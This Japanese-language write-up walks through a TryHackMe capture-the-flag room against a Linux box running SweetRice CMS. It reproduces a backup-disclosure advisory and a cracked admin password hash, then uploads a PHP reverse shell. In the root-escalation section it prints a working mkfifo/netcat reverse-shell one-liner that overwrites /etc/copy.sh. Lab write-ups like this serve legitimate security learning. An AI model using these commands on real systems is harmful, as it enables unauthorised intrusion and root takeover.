最初に
Linuxを攻撃するRoomのようです
Task 1
What is the user flag?
まずはnmap!
HTTP接続してみます!
よくみるubuntuのページですね
dirbusterしてみたところ、/contentsがあるみたい
SweetRiceに脆弱性があるかみてみます
Backup Discloserの脆弱性をみていきます
これはWriteupをみて知ったのですが、バックアップにログイン情報が入っている可能性があるためです。。
テキストファイルの中身は以下になります
Title: SweetRice 1.5.1 - Backup Disclosure
Application: SweetRice
Versions Affected: 1.5.1
Vendor URL: http://www.basic-cms.org/
Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
Discovered by: Ashiyane Digital Security Team
Tested on: Windows 10
Bugs: Backup Disclosure
Date: 16-Sept-2016
Proof of Concept :
You can access to all mysql backup and download them from this directory.
http://localhost/inc/mysql_backup
and can access to website files backup from:
http://localhost/SweetRice-transfer.zip
http://localhost/inc/mysql_backupにあるみたいですが、/incは/content/incにあるので、そこだけ修正します
SQLファイルがありました!
これをダウンロードして開いてみてみると、怪しい文言が。。。
managerのパスワードは
42f749ade7f9e195bf475f37a44cafcb
。。。
ではなく、上記はパスワードのハッシュ値ですね(-_-;)
CrackStationを使って、ハッシュ値をクラックすれば、/asのログイン画面を突破できます!!
ログインすれば、adsタブを選択するとWebUIでファイルを作成することができるので、以下のURLのPHPリバースシェルの内容を貼り付けます
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
先にリバースシェルを待ち構えておいて。。。
phpファイルをクリックするとリバースシェルがはれます!
www-dataというユーザー名でログインしていますね
/home/itguy/user.txtにフラグが記載されています!
What is the root flag?
まずは現在のユーザがroot権限で何ができるのか確認
perlが使えて、backup.plにもアクセスできるのか
backup.plは以下で、Perlコマンドで、copy.shを実行するとのこと
じゃあ、copy.shはというとリバースシェルを張りに行くコマンド。。。
192.168.0.190って何のIPアドレス?と思って、www-dataからnmapしたかったがnampが入っていなかった、、、
Writeupをみてみると、IPアドレスはTryHackMeにVPN接続しているIPアドレスを記載するとのこと。
なるほど、リバースシェルを張った先から、さらにリバースシェルをはるのか(考えた人すごいな笑)
以下のコマンドを使って、copy.shの内容を上書き
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.1.106 5554 >/tmp/f' >/etc/copy.sh
ローカルからリバースシェルを待っておいて、、、
root権限のあるperlでbackup.shを実行すると
リバースシェルがはれました!
しかもroot!
あとは/root/root/txtを開けば、フラグがあります!
最後に
今回学んだことは以下2つです!
- パスワードはハッシュ化されている
- リバースシェルを2重に張ることも可能